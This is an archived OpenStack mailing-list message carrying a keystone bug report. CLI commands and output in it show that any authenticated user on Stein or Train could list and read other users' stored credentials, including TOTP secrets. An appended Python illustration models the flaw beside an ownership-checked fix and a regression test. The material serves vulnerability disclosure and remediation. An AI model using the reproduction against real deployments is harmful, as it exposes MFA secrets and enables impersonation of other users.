[Bug 1855080] Re: Credentials API allows listing and retrieving of all user's credentials
Jeremy Stanley
fungi at yuggoth.org
Thu Dec 5 17:57:21 UTC 2019
Daniel, is there any organization you want credited along with you for
reporting this defect?
Gage, I think the use of "user's" in the title (copied from the report
itself) incorrectly suggests that a user only has access to credentials
for their own user rather than, as the description explains, for all
users in that project. Instead maybe try "Credentials API allows listing
and retrieving of project credentials" or something like that? As for
the affects line, assuming this problem was only introduced in Stein,
you want "==15.0.0, ==16.0.0" (wow, were there really no stable/stein
point releases?!?) or alternatively ">=15.0.0 <15.0.1, >=16.0.0 <16.0.1"
to accurately reflect that any point releases will contain the fix.
https://bugs.launchpad.net/bugs/1855080
Title: Credentials API allows listing and retrieving of all user's credentials
Status in OpenStack Identity (keystone): In Progress
Status in OpenStack Security Advisory: Confirmed
Status in keystone package in Ubuntu: New
Bug description:
Tested against Stein and Train.
# User creating a credential, i.e. totp or similar
$ OS_CLOUD=1 openstack token issue
| project_id | c3caf1b55bb84b78a795fd81838e5160
| user_id | 9971b0f13d2d4a578212d028a53c3209
$ OS_CLOUD=1 openstack credential create --type test 9971b0f13d2d4a578212d028a53c3209 test-data
$ OS_CLOUD=1 openstack credential list
+----------------------------------+------+----------------------------------+-----------+------------+
| ID | Type | User ID | Data | Project ID |
+----------------------------------+------+----------------------------------+-----------+------------+
| 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None |
+----------------------------------+------+----------------------------------+-----------+------------+
# Different User but same Project
$ OS_CLOUD=2 openstack token issue
| project_id | c3caf1b55bb84b78a795fd81838e5160
| user_id | 6b28a0b073fc4ac7843f33190ebc5c3c
$ OS_CLOUD=2 openstack credential list
+----------------------------------+------+----------------------------------+-----------+------------+
| ID | Type | User ID | Data | Project ID |
+----------------------------------+------+----------------------------------+-----------+------------+
| 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None |
+----------------------------------+------+----------------------------------+-----------+------------+
# Different User and Different Project
$ OS_CLOUD=3 openstack token issue
| project_id | d43f20ae5a7e4f36b701710277384401
| user_id | 2e48f1a7d1474391a826a2b9700e5949
$ OS_CLOUD=3 openstack credential list
+----------------------------------+------+----------------------------------+-----------+------------+
| ID | Type | User ID | Data | Project ID |
+----------------------------------+------+----------------------------------+-----------+------------+
| 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None |
+----------------------------------+------+----------------------------------+-----------+------------+
As shown, anyone who's authenticated can retrieve any credentials,
including their 'secret'.
This is a rather severe information disclosure vulnerability and
completely defies the purpose of TOTP or MFA, as these credentials are
not kept secure or private whatsoever.
If auth rules are configured to allow login with only 'totp', it would be
extremely easy to assume a different user's identity.
A CVE should be issued for this. I can take care of that paperwork.
Versions affected and tested:
Train/ubuntu:
$ dpkg -l | grep keystone
ii keystone 2:16.0.0-0ubuntu1~cloud0 all OpenStack identity service - Daemons
ii keystone-common 2:16.0.0-0ubuntu1~cloud0 all OpenStack identity service - Common files
ii python-keystoneauth1 3.13.1-0ubuntu1~cloud0 all authentication library for OpenStack Identity - Python 2.7
ii python-keystoneclient 1:3.19.0-0ubuntu1~cloud0 all client library for the OpenStack Keystone API - Python 2.x
ii python-keystonemiddleware 6.0.0-0ubuntu1~cloud0 all Middleware for OpenStack Identity (Keystone) - Python 2.x
ii python3-keystone 2:16.0.0-0ubuntu1~cloud0 all OpenStack identity service - Python 3 library
ii python3-keystoneauth1 3.17.1-0ubuntu1~cloud0 all authentication library for OpenStack Identity - Python 3.x
ii python3-keystoneclient 1:3.21.0-0ubuntu1~cloud0 all client library for the OpenStack Keystone API - Python 3.x
ii python3-keystonemiddleware 7.0.1-0ubuntu1~cloud0 all Middleware for OpenStack Identity (Keystone) - Python 3.x
Stein/RHEL:
$ rpm -qa | grep keystone
python3-keystoneclient-3.19.0-0.20190312070330.6c4bb8b.el8ost.noarch
openstack-keystone-15.0.1-0.20190720060412.5f27c4b.el8ost.noarch
python3-keystoneauth1-3.13.1-0.20190311052414.bde07bc.el8ost.noarch
python3-keystonemiddleware-6.0.0-0.20190312071144.fca37ea.el8ost.noarch
python3-keystone-15.0.1-0.20190720060412.5f27c4b.el8ost.noarch
More information about the Ubuntu-openstack-bugs
mailing list
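The defect the reporter demonstrates is an authorization gap of a familiar shape: the API checks that the caller is authenticated but never checks that the caller owns the credential it is about to return. The following is an added illustration written for this page, not keystone's code and not the fix that landed for this bug. The store, the `TokenContext` fields, the `admin` role override and the function names are all assumptions; the user, project and credential IDs are the ones from the reporter's transcript, reused as constructed sample data. It shows the unfiltered listing beside an ownership-scoped listing and retrieval, plus a regression check that a deployment could run with two tokens to confirm that a non-owner sees nothing.

```python
"""Illustrative model of a missing ownership check in a credential API.

Added example code; not keystone's implementation. Field names, the
admin override and the helper functions are assumptions for this example.
"""
from dataclasses import dataclass
from typing import Callable, FrozenSet, Iterable, List, Optional


class Forbidden(Exception):
    """Raised when a caller is not permitted to read a credential."""


@dataclass(frozen=True)
class Credential:
    id: str
    type: str
    user_id: str                  # owner of the credential
    blob: str                     # the secret; the "Data" column in the report
    project_id: Optional[str] = None


@dataclass(frozen=True)
class TokenContext:
    """What the API layer knows about the caller (assumed field names)."""
    user_id: str
    project_id: str
    roles: FrozenSet[str] = frozenset()


# Constructed sample data mirroring the reporter's transcript: one credential
# owned by the first user, and three callers (owner, same project, other project).
STORE: List[Credential] = [
    Credential("0a3a2d3b7dad4886b0bbf61b6cd7d2b0", "test",
               "9971b0f13d2d4a578212d028a53c3209", "test-data"),
]
OWNER = TokenContext("9971b0f13d2d4a578212d028a53c3209",
                     "c3caf1b55bb84b78a795fd81838e5160")
SAME_PROJECT = TokenContext("6b28a0b073fc4ac7843f33190ebc5c3c",
                            "c3caf1b55bb84b78a795fd81838e5160")
OTHER_PROJECT = TokenContext("2e48f1a7d1474391a826a2b9700e5949",
                             "d43f20ae5a7e4f36b701710277384401")
ADMIN = TokenContext("admin-user-id", "admin-project-id", frozenset({"admin"}))


def list_credentials_unfiltered(ctx: TokenContext,
                                store: List[Credential] = STORE) -> List[Credential]:
    """Behaviour the report describes: authentication is required, ownership is never checked."""
    return list(store)


def is_owner_or_admin(ctx: TokenContext, cred: Credential) -> bool:
    """Assumed rule: a credential is readable by its owner or by an admin-role caller."""
    return cred.user_id == ctx.user_id or "admin" in ctx.roles


def list_credentials_scoped(ctx: TokenContext,
                            store: List[Credential] = STORE) -> List[Credential]:
    """Hardened listing: filter the result set by ownership, not just the request."""
    return [c for c in store if is_owner_or_admin(ctx, c)]


def get_credential_scoped(ctx: TokenContext, cred_id: str,
                          store: List[Credential] = STORE) -> Credential:
    """Hardened retrieval: the same rule is enforced per object, so GET cannot bypass the list filter."""
    for c in store:
        if c.id == cred_id:
            if not is_owner_or_admin(ctx, c):
                raise Forbidden(f"{ctx.user_id} may not read credential {cred_id}")
            return c
    raise KeyError(cred_id)


def can_read(ctx: TokenContext, cred_id: str,
             store: List[Credential] = STORE) -> bool:
    """Convenience wrapper: True if the scoped GET succeeds for this caller."""
    try:
        get_credential_scoped(ctx, cred_id, store)
        return True
    except Forbidden:
        return False


def leaked_credential_ids(lister: Callable[..., List[Credential]],
                          callers: Iterable[TokenContext],
                          store: List[Credential] = STORE) -> List[str]:
    """Regression check: IDs of credentials a non-admin caller can list but does not own.

    Run against the unfiltered lister this reproduces the report; against the
    scoped lister it must return an empty list.
    """
    leaked: List[str] = []
    for ctx in callers:
        if "admin" in ctx.roles:
            continue
        for c in lister(ctx, store):
            if c.user_id != ctx.user_id and c.id not in leaked:
                leaked.append(c.id)
    return leaked


if __name__ == "__main__":
    callers = [OWNER, SAME_PROJECT, OTHER_PROJECT]
    print("unfiltered leaks:", leaked_credential_ids(list_credentials_unfiltered, callers))
    print("scoped leaks:    ", leaked_credential_ids(list_credentials_scoped, callers))
```

Two points worth noting. The filter has to be applied to the result set of the list call and again inside the single-object GET; fixing only the list endpoint leaves retrieval by ID open, which is the second half of what the report's title names. In a real service the `Forbidden` path is usually surfaced as a not-found response rather than a distinct 403 so that a non-owner cannot use the status code to confirm that a given credential ID exists; the example keeps the exception distinct only so the check functions are easy to assert on.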